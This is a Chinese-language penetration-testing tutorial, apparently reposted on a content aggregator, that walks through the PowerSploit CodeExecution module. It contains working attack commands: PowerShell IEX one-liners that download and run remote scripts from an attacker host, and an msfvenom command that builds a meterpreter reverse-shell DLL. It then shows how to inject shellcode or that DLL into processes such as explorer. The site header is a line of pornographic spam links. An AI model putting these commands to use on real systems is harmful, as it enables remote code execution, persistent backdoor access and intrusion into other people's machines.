日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 >

PowerSploit-CodeExecution(代码执行)脚本渗透实战

發布時間:2024/10/12 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 PowerSploit-CodeExecution(代码执行)脚本渗透实战 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

首先介紹一下國外大牛制作的Powershell滲透工具PowerSploit,上面有很多powershell攻擊腳本,它們主要被用來滲透中的信息偵察、權限提升、權限維持。

項目地址:https://github.com/PowerShellMafia/PowerSploit


該利器主要分為幾個板塊

一、代碼執行(CodeExecution)

1.?Invoke-DllInjection?

2.?Invoke-ReflectivePEInjection

3.?Invoke-Shellcode

4.?Invoke-WmiCommand

二、腳本修改(ScriptModification)

1. Out-EncodedCommand

2. Out-CompressedDll

3. Out-EncryptedScript

4. Remove-Comments

三、權限維持(Persistence)

1. New-UserPersistenceOption

2. New-ElevatedPersistenceOption

3. Add-Persistence

4. Install-SSP

5. Get-SecurityPackages

四、繞過殺毒軟件(AntivirusBypass)

Find-AVSignature

五、信息收集(Exfiltration)

這個文件夾主要是收集目標主機上的信息。

六、信息偵察(Recon)

這個文件夾主要是以目標主機為跳板進行內網主機偵察。

?

總結下就是:

CodeExecution 在目標主機執行代碼

ScriptModification 在目標主機上創建或修改腳本

Persistence 后門腳本(持久性控制)

AntivirusBypass 發現殺軟查殺特征

Exfiltration 目標主機上的信息搜集工具

Mayhem 藍屏等破壞性腳本

Recon 以目標主機為跳板進行內網信息偵查

安裝方法

我們在Linux下首先clone這個git:

git clone https://github.com/PowerShellMafia/PowerSploit.git

然后將clone下的文件放入保證被攻擊機能夠訪問的機器上面,這里我們采用本機,在本機搭建apache環境,將文件放入/var/www/html目錄下即可。
開啟apache服務:

service apache2 start

?


?

?

?

?

?

實戰運用:

?

CodeExecution模塊

a)?調用Invoke-Shellcode將shellcode注入到本地的Powershell。

1)利用msfvenom生成一個反彈木馬,以供invoke-shellcode注入,同樣生成的反彈馬放入web中。

?

2)?調用目標機的powershell進行IEX遠程下載invoke-shellcode腳本和生成的木馬

首先下載腳本

PS C:\Documents and Settings\Administrator> IEX(New-Object Net.Webclient).DownloadString("http://192.168.190.141/PowerSp loit/CodeExecution/Invoke-Shellcode.ps1")

下載生成好的木馬

PS C:\Users\Administrator> IEX(New-Object Net.Webclient).DownloadString("http://192.168.190.141/code")

?

?3)kali設置msf監聽

?

4)在powershell中調用invoke-shellcode(可通過help命令來查詢具體操作以及例子)。

?

PS C:\Users\Administrator> Invoke-Shellcode -Shellcode $buf -Force

?

?

?

?

?

?

?

b) 調用invoke-shellcode將shellcode注入到指定的進程中。

1)前面步驟和a的步驟一致,唯一不同的就是在最后的命令上,首先,查看我們需要注入的進程,建議可注入到系統的進程,因為一旦進程關閉,那么監聽也將終斷,因此系統進程一般不會被關閉,注意:不能注入到像360等驅動中,不然會被強制關閉。

?比如我要注入explorer這個進程(Windows程序管理器或者文件資源管理器) ,首先要查看該進程的pid

ps -Name explorer

?

?

?

??可以看到id為1228?注入該進程

?

Invoke-Shellcode -Shellcode $buf -ProcessID 1228 -Force

?

注意:和a類似的,若關閉注入的進程,則連接中斷。

?

c) 調用invoke-dllinjection將DLL注入到進程中。

?

1)通過msfvenom生成DLL的反彈木馬,并下載到目標主機中(為了方便,直接將dll文件下載至powershell運行的桌面),在實際環境中,也可以通過該方法進行傳輸dll文件。

?

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.190.141 lport=4444 -f dll -o /var/www/html/code.dll

?

?開啟監聽?注意payload需要和生成的dll執行的payload一致;

?

PS C:\Users\Administrator> IEX(New-Object Net.Webclient).DownloadString("http://192.168.190.141/PowerSploit/CodeExecutio
n/Invoke-DllInjection.ps1")

?

注入

PS C:\Users\Administrator> Invoke-DllInjection -Dll .\code.dll -ProcessID 2700

?

?

?

轉載于:https://www.cnblogs.com/-qing-/p/10539471.html

總結

以上是生活随笔為你收集整理的PowerSploit-CodeExecution(代码执行)脚本渗透实战的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。